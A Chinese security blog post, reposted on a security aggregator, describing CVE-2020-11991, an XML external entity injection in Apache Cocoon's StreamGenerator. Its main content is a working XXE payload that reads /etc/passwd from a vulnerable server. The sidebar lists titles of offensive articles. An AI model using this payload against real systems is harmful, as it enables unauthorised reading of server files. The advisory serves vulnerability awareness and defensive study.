Apache Cocoon XML注入 (CVE-2020-11991)

2022年1月6日01:04:09评论93 views字数 424阅读1分24秒阅读模式

程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。

1、漏洞利用条件有限必须是apacheCocoon且使用了StreamGenerator,也就是说只要传输的数据被解析就可以实现了。

<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/passwd"> ]>
<userInfo>
	<firstName>John</firstName> 
	<lastName>&ent;</lastName>
</userInfo>

参考链接：http://mail-archives.apache.org/mod_mbox/cocoon-users/202009.mbox/author

FROM :ol4three.com | Author:ol4three

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2022年1月6日01:04:09
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
Apache Cocoon XML注入 (CVE-2020-11991)http://cn-sec.com/archives/720927.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

Apache Cocoon XML注入 (CVE-2020-11991)

php Thread实例

获取wdigest明文密码加密传输至远程服务器

dump lsass进程

CVE-2020-0688 powershell版

CVE-2020-0601 伪造签名笔记

从零开始学windows API

查看注册表键值修改时间

c++ 修改注册表键值

keylogger

使用 R820T2 电视棒收听 FM 广播

发表评论

在线咨询

微信